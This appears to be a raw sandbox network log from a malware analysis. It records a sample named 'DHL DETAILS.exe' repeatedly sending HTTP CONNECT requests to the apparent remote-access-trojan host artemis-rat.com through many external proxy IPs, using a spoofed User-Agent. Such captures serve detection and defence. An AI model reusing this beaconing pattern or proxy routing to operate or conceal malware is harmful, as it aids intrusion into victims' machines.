                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    966192.168.2.55303384.39.112.14431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.169275999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    967192.168.2.55072123.225.72.12235006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.171240091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.270586014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    968192.168.2.553029167.172.86.46104716352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.173547983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    969192.168.2.5530378.218.231.62156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.173594952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    970192.168.2.55312945.144.30.2054436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.173600912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    971192.168.2.550806132.148.16.169418246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.174479961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.223968029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    972192.168.2.55303145.118.132.180454496352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.174771070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    973192.168.2.550076167.172.67.20780006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.183429956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.542408943 CET19INHTTP/1.0 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    974192.168.2.55313745.144.30.2054436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.188127995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    975192.168.2.55314745.144.30.2054436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.190932035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    976192.168.2.55314945.144.30.2054436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.192908049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    977192.168.2.55315131.7.65.184436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.194241047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    978192.168.2.55315231.7.65.184436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.195017099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    979192.168.2.55315731.7.65.184436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.196331978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    980192.168.2.55315931.7.65.184436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.197271109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    981192.168.2.553051192.154.244.9290006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.205298901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    982192.168.2.55303865.21.255.19731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.213779926 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:16.543402910 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:16.872688055 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    983192.168.2.55304046.35.9.110806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.229823112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    984192.168.2.55304223.137.248.19788886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.229825974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    985192.168.2.55303589.218.8.15210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.242698908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.036458969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    986192.168.2.5522208.130.34.23799996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.247016907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.580643892 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    987192.168.2.5530398.222.239.209806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.250076056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.973912001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    988192.168.2.552717192.111.134.1041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.252144098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    989192.168.2.550708194.233.78.142355136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.253968000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.333271980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    990192.168.2.549877112.196.112.243806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.260934114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.695116043 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    991192.168.2.55183272.49.49.11310346352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.261200905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    992192.168.2.55306745.12.30.231806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.261955976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.416416883 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    993192.168.2.553043185.49.31.20780816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.262070894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    994192.168.2.553070104.24.193.186806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.263015032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.417964935 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    995192.168.2.552291148.66.130.53563506352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.264501095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    996192.168.2.5530418.219.228.100156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.323626995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    997192.168.2.55235460.188.102.225180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.323678970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    998192.168.2.55054651.68.164.77328246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.329602003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.333247900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    999192.168.2.553050192.252.216.8141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.332663059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1000192.168.2.55243551.222.241.157300116352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.332665920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1001192.168.2.550739138.36.199.1441536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.333108902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1002192.168.2.55242892.204.135.37586046352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.335525036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.380122900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.380707026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.380186081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1003192.168.2.55230045.11.95.16552196352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.335611105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1004192.168.2.553091104.18.81.76806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.335675001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
